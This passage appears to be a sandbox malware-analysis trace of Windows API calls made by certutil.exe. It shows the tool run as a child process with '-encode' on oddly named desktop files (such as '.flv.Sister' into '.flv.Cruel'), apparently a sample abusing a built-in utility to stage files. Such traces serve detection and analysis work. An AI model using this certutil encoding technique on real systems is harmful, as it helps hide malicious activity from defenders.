?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0254.153] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0254.154] GetCommandLineW () returned="certutil -encode \"sOzzAEtr.flv.Sister\" \"sOzzAEtr.flv.Cruel\"" [0254.154] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x2bac4e1b780 [0254.155] GetSystemTime (in: lpSystemTime=0xf7d407f390 | out: lpSystemTime=0xf7d407f390*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x31, wSecond=0x1c, wMilliseconds=0x2b7)) [0254.155] SystemTimeToFileTime (in: lpSystemTime=0xf7d407f390, lpFileTime=0xf7d407f388 | out: lpFileTime=0xf7d407f388) returned 1 [0254.155] FileTimeToLocalFileTime (in: lpFileTime=0xf7d407f388, lpLocalFileTime=0xf7d407f350 | out: lpLocalFileTime=0xf7d407f350) returned 1 [0254.155] FileTimeToSystemTime (in: lpFileTime=0xf7d407f350, lpSystemTime=0xf7d407f0c0 | out: lpSystemTime=0xf7d407f0c0) returned 1 [0254.155] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0xf7d407f0c0, lpFormat=0x0, lpDateStr=0xf7d407f1d0, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0254.155] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0xf7d407f0c0, lpFormat=0x0, lpTimeStr=0xf7d407f0d0, cchTime=128 | out: lpTimeStr="8:49 PM") returned 8 [0254.155] _vsnwprintf (in: _Buffer=0xf7d407f0de, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0xf7d407f0a8 | out: _Buffer=" 28.695s") returned 8 [0254.155] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x2bac4e1df20 [0254.155] SetLastError (dwErrCode=0x80070716) [0254.155] _vsnwprintf (in: _Buffer=0xf7d407f158, _BufferCount=0xb, _Format="%d", _ArgList=0xf7d407f148 | out: _Buffer="948") returned 3 [0254.155] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0xf7d407ef10, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0254.156] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x2bac4e1b980 [0254.156] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x2bac4e0b630 [0254.156] LocalFree (hMem=0x2bac4e1df20) returned 0x0 [0254.156] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf7d407f400 | out: lpSystemTimeAsFileTime=0xf7d407f400*(dwLowDateTime=0xc219076c, dwHighDateTime=0x1d6141f)) [0254.156] GetLocalTime (in: lpSystemTime=0xf7d407f438 | out: lpSystemTime=0xf7d407f438*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x31, wSecond=0x1c, wMilliseconds=0x2b9)) [0254.156] SystemTimeToFileTime (in: lpSystemTime=0xf7d407f438, lpFileTime=0xf7d407f410 | out: lpFileTime=0xf7d407f410) returned 1 [0254.156] CompareFileTime (lpFileTime1=0xf7d407f410, lpFileTime2=0xf7d407f400) returned 1 [0254.156] _vsnwprintf (in: _Buffer=0xf7d407f448, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0xf7d407f3d8 | out: _Buffer="GMT + 2.00") returned 10 [0254.156] LocalFree (hMem=0x2bac4e1b780) returned 0x0 [0254.157] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcde520000 [0254.157] FindResourceW (hModule=0x7ffcde520000, lpName=0x1, lpType=0x10) returned 0x7ffcde5e0090 [0254.157] LoadResource (hModule=0x7ffcde520000, hResInfo=0x7ffcde5e0090) returned 0x7ffcde5e00b0 [0254.157] LockResource (hResData=0x7ffcde5e00b0) returned 0x7ffcde5e00b0 [0254.157] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0254.157] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0xf7d407f478 | out: _Buffer="10.0.15063.447") returned 14 [0254.157] GetACP () returned 0x4e4 [0254.157] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0254.157] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2bac4e1b920 [0254.157] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x2bac4e1b920, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0254.157] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x2bac4e1e1e0 [0254.157] _vsnwprintf (in: _Buffer=0x2bac4e1e1e0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xf7d407f4c8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0254.157] LocalFree (hMem=0x2bac4e1b920) returned 0x0 [0254.157] LocalFree (hMem=0x0) returned 0x0 [0254.158] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0254.158] GetACP () returned 0x4e4 [0254.158] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0254.158] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2bac4e1b6e0 [0254.158] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x2bac4e1b6e0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0254.158] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x2bac4e1e060 [0254.158] _vsnwprintf (in: _Buffer=0x2bac4e1e060, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xf7d407f4c8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0254.158] LocalFree (hMem=0x2bac4e1b6e0) returned 0x0 [0254.158] LocalFree (hMem=0x0) returned 0x0 [0254.158] GetACP () returned 0x4e4 [0254.158] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0254.158] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2bac4e1b820 [0254.158] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x2bac4e1b820, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0254.158] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x2bac4e1e120 [0254.158] _vsnwprintf (in: _Buffer=0x2bac4e1e120, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xf7d407f4f8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0254.158] LocalFree (hMem=0x2bac4e1b820) returned 0x0 [0254.158] LocalFree (hMem=0x2bac4e1e1e0) returned 0x0 [0254.159] LocalFree (hMem=0x2bac4e1e060) returned 0x0 [0254.159] LocalFree (hMem=0x2bac4e1e120) returned 0x0 [0254.159] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0254.159] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0254.159] GetStockObject (i=0) returned 0x900010 [0254.159] RegisterClassW (lpWndClass=0xf7d407f620) returned 0xc1a2 [0254.160] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x2702be [0254.252] NtdllDefWindowProc_W () returned 0x0 [0254.253] NtdllDefWindowProc_W () returned 0x1 [0254.261] NtdllDefWindowProc_W () returned 0x0 [0254.274] UpdateWindow (hWnd=0x2702be) returned 1 [0254.274] PostMessageW (hWnd=0x2702be, Msg=0x400, wParam=0x0, lParam=0x2bac4e0217e) returned 1 [0254.274] GetMessageW (in: lpMsg=0xf7d407f670, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xf7d407f670) returned 1 [0254.274] TranslateMessage (lpMsg=0xf7d407f670) returned 0 [0254.274] DispatchMessageW (lpMsg=0xf7d407f670) returned 0x0 [0254.274] NtdllDefWindowProc_W () returned 0x0 [0254.274] GetMessageW (in: lpMsg=0xf7d407f670, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xf7d407f670) returned 1 [0254.274] TranslateMessage (lpMsg=0xf7d407f670) returned 0 [0254.274] DispatchMessageW (lpMsg=0xf7d407f670) returned 0x0 [0254.274] LocalAlloc (uFlags=0x0, uBytes=0x66) returned 0x2bac4e043e0 [0254.274] LocalAlloc (uFlags=0x0, uBytes=0x72) returned 0x2bac4e08520 [0254.274] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0254.275] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0254.275] SetLastError (dwErrCode=0x80070716) [0254.275] _vsnwprintf (in: _Buffer=0xf7d407f078, _BufferCount=0xb, _Format="%d", _ArgList=0xf7d407f068 | out: _Buffer="465") returned 3 [0254.275] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0xf7d407ee30, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0254.275] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x2bac4e14690 [0254.275] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0254.275] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0254.275] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0xf7d407ee10, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0254.275] GetLastError () returned 0xcb [0254.276] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0254.276] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0254.276] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0254.276] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0254.276] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0254.276] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0254.276] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0254.276] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0254.276] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0254.276] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0254.276] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0254.276] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0254.276] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0254.276] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0254.276] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0254.276] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0254.276] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0254.276] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0254.276] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0254.276] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0254.276] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0254.277] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0xf7d407ead8 | out: phkResult=0xf7d407ead8*=0x23c) returned 0x0 [0254.277] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x2bac4e09350 [0254.277] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0xf7d407f048, lpData=0xf7d407f078, lpcbData=0xf7d407f040*=0x4 | out: lpType=0xf7d407f048*=0x0, lpData=0xf7d407f078*=0x0, lpcbData=0xf7d407f040*=0x4) returned 0x2 [0254.277] LocalFree (hMem=0x2bac4e09350) returned 0x0 [0254.277] RegCloseKey (hKey=0x23c) returned 0x0 [0254.277] LocalFree (hMem=0x0) returned 0x0 [0254.277] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x2bac4e2c690 [0254.343] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0254.343] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0254.343] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0254.343] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0254.343] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0254.343] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0254.343] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0254.343] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0254.343] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0254.343] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0254.343] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0254.343] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0254.343] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0254.343] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0254.343] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0254.343] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0254.343] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x2bac4e314a0 [0254.343] GetComputerNameW (in: lpBuffer=0x2bac4e314a0, nSize=0xf7d407f040 | out: lpBuffer="NQDPDE", nSize=0xf7d407f040) returned 1 [0254.344] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0xf7d407f010 | out: lpBuffer=0x0, nSize=0xf7d407f010) returned 0 [0254.344] GetLastError () returned 0xea [0254.344] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2bac4e1bac0 [0254.344] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x2bac4e1bac0, nSize=0xf7d407f010 | out: lpBuffer="NQdPdE", nSize=0xf7d407f010) returned 1 [0254.345] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0254.349] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x2bac4e317e0, cbCertEncoded=0xe565) returned 0x0 [0254.354] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x2bac4e317e0, cbCrlEncoded=0xe565) returned 0x0 [0254.356] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x2bac4e317e0, cbEncoded=0xe565, dwFlags=0x8000, pDecodePara=0xf7d407eef0, pvStructInfo=0xf7d407ef80, pcbStructInfo=0xf7d407ef74 | out: pvStructInfo=0xf7d407ef80, pcbStructInfo=0xf7d407ef74) returned 0 [0254.356] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x2bac4e317e0, cbEncoded=0xe565, dwFlags=0x8000, pDecodePara=0xf7d407eef0, pvStructInfo=0xf7d407ef80, pcbStructInfo=0xf7d407ef74 | out: pvStructInfo=0xf7d407ef80, pcbStructInfo=0xf7d407ef74) returned 0 [0254.356] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x2bac4e317e0, cbEncoded=0xe565, dwFlags=0x8000, pDecodePara=0xf7d407eef0, pvStructInfo=0xf7d407ef80, pcbStructInfo=0xf7d407ef74 | out: pvStructInfo=0xf7d407ef80, pcbStructInfo=0xf7d407ef74) returned 0 [0254.356] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x2bac4e149d0 [0254.368] CryptMsgUpdate (hCryptMsg=0x2bac4e149d0, pbData=0x2bac4e317e0, cbData=0xe565, fFinal=1) returned 0 [0254.368] GetLastError () returned 0x8009310b [0254.368] CryptMsgClose (hCryptMsg=0x2bac4e149d0) returned 1 [0254.368] GetFileAttributesExW (in: lpFileName="sOzzAEtr.flv.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\sozzaetr.flv.sister"), fInfoLevelId=0x0, lpFileInformation=0xf7d407efa0 | out: lpFileInformation=0xf7d407efa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x211c8ad0, ftCreationTime.dwHighDateTime=0x1d5e77b, ftLastAccessTime.dwLowDateTime=0x10340cc0, ftLastAccessTime.dwHighDateTime=0x1d5e479, ftLastWriteTime.dwLowDateTime=0x10340cc0, ftLastWriteTime.dwHighDateTime=0x1d5e479, nFileSizeHigh=0x0, nFileSizeLow=0xe565)) returned 1 [0254.369] _vsnwprintf (in: _Buffer=0xf7d407efa8, _BufferCount=0xb, _Format="%d", _ArgList=0xf7d407ef98 | out: _Buffer="359") returned 3 [0254.369] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0xf7d407ed60, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0254.369] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x2bac4e31440 [0254.369] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0254.369] _vsnwprintf (in: _Buffer=0xf7d407df90, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0xf7d407efe8 | out: _Buffer="Input Length = 58725") returned 20 [0254.369] GetFileType (hFile=0x50) returned 0x2 [0254.369] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xf7d407df90*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0xf7d407df44, lpReserved=0x0 | out: lpBuffer=0xf7d407df90*, lpNumberOfCharsWritten=0xf7d407df44*=0x14) returned 1 [0254.526] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0254.526] _vsnwprintf (in: _Buffer=0xf7d407df90, _BufferCount=0x1ff, _Format="\n", _ArgList=0xf7d407efe8 | out: _Buffer="\n") returned 1 [0254.526] GetFileType (hFile=0x50) returned 0x2 [0254.526] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xf7d407df90*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xf7d407df44, lpReserved=0x0 | out: lpBuffer=0xf7d407df90*, lpNumberOfCharsWritten=0xf7d407df44*=0x1) returned 1 [0254.729] GetFileAttributesExW (in: lpFileName="sOzzAEtr.flv.Cruel" (normalized: "c:\\users\\fd1hvy\\desktop\\sozzaetr.flv.cruel"), fInfoLevelId=0x0, lpFileInformation=0xf7d407efa0 | out: lpFileInformation=0xf7d407efa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc260975a, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xc260975a, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xc26a4619, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x13ba4)) returned 1 [0254.730] _vsnwprintf (in: _Buffer=0xf7d407efa8, _BufferCount=0xb, _Format="%d", _ArgList=0xf7d407ef98 | out: _Buffer="361") returned 3 [0254.730] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0xf7d407ed60, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0254.730] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x2bac4e31410 [0254.730] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0254.730] _vsnwprintf (in: _Buffer=0xf7d407df90, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0xf7d407efe8 | out: _Buffer="Output Length = 80804") returned 21 [0254.730] GetFileType (hFile=0x50) returned 0x2 [0254.730] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xf7d407df90*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0xf7d407df44, lpReserved=0x0 | out: lpBuffer=0xf7d407df90*, lpNumberOfCharsWritten=0xf7d407df44*=0x15) returned 1 [0254.782] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0254.782] _vsnwprintf (in: _Buffer=0xf7d407df90, _BufferCount=0x1ff, _Format="\n", _ArgList=0xf7d407efe8 | out: _Buffer="\n") returned 1 [0254.782] GetFileType (hFile=0x50) returned 0x2 [0254.782] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xf7d407df90*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xf7d407df44, lpReserved=0x0 | out: lpBuffer=0xf7d407df90*, lpNumberOfCharsWritten=0xf7d407df44*=0x1) returned 1 [0254.997] LocalFree (hMem=0x2bac4e317e0) returned 0x0 [0254.998] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0254.998] _vsnwprintf (in: _Buffer=0xf7d407f008, _BufferCount=0xb, _Format="%d", _ArgList=0xf7d407eff8 | out: _Buffer="2022") returned 4 [0254.998] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0xf7d407edc0, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0254.998] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x2bac4e087c0 [0254.998] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0254.998] _vsnwprintf (in: _Buffer=0xf7d407dff0, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0xf7d407f048 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0254.998] GetFileType (hFile=0x50) returned 0x2 [0254.998] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xf7d407dff0*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0xf7d407dfa4, lpReserved=0x0 | out: lpBuffer=0xf7d407dff0*, lpNumberOfCharsWritten=0xf7d407dfa4*=0x31) returned 1 [0255.126] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0255.126] _vsnwprintf (in: _Buffer=0xf7d407dff0, _BufferCount=0x1ff, _Format="\n", _ArgList=0xf7d407f048 | out: _Buffer="\n") returned 1 [0255.126] GetFileType (hFile=0x50) returned 0x2 [0255.126] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xf7d407dff0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xf7d407dfa4, lpReserved=0x0 | out: lpBuffer=0xf7d407dff0*, lpNumberOfCharsWritten=0xf7d407dfa4*=0x1) returned 1 [0255.145] LocalFree (hMem=0x0) returned 0x0 [0255.145] LocalFree (hMem=0x2bac4e08520) returned 0x0 [0255.145] LocalFree (hMem=0x2bac4e043e0) returned 0x0 [0255.145] SetLastError (dwErrCode=0x80070716) [0255.145] _vsnwprintf (in: _Buffer=0xf7d407f078, _BufferCount=0xb, _Format="%d", _ArgList=0xf7d407f068 | out: _Buffer="511") returned 3 [0255.145] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0xf7d407ee30, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0255.145] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x2bac4e314d0 [0255.145] PostQuitMessage (nExitCode=0) [0255.145] GetMessageW (in: lpMsg=0xf7d407f670, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xf7d407f670) returned 0 [0255.146] LocalFree (hMem=0x2bac4e1bac0) returned 0x0 [0255.146] LocalFree (hMem=0x2bac4e314a0) returned 0x0 [0255.146] LocalFree (hMem=0x0) returned 0x0 [0255.146] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0255.146] GetLastError () returned 0x7e [0255.147] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0255.147] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0255.147] DllMain () returned 0x1 [0255.147] LocalFree (hMem=0x2bac4e1b980) returned 0x0 [0255.147] LocalFree (hMem=0x2bac4e14690) returned 0x0 [0255.147] LocalFree (hMem=0x2bac4e31440) returned 0x0 [0255.147] LocalFree (hMem=0x2bac4e31410) returned 0x0 [0255.147] LocalFree (hMem=0x2bac4e087c0) returned 0x0 [0255.147] LocalFree (hMem=0x2bac4e314d0) returned 0x0 [0255.147] LocalFree (hMem=0x2bac4e0b630) returned 0x0 [0255.147] LocalFree (hMem=0x2bac4e14900) returned 0x0 [0255.147] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0255.147] GetLastError () returned 0x7e [0255.148] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0255.148] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0255.148] DllMain () returned 0x1 [0255.148] exit (_Code=0) Thread: id = 84 os_tid = 0x117c Process: id = "31" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0xb6fe000" os_pid = "0xf84" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"t2RoafwhrVeC_4Hu.gif.Sister\" \"t2RoafwhrVeC_4Hu.gif.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 85 os_tid = 0xf80 [0256.055] GetStartupInfoW (in: lpStartupInfo=0xa9a767faa0 | out: lpStartupInfo=0xa9a767faa0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"t2RoafwhrVeC_4Hu.gif.Sister\" \"t2RoafwhrVeC_4Hu.gif.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0256.057] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0256.057] __set_app_type (_Type=0x1) [0256.057] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 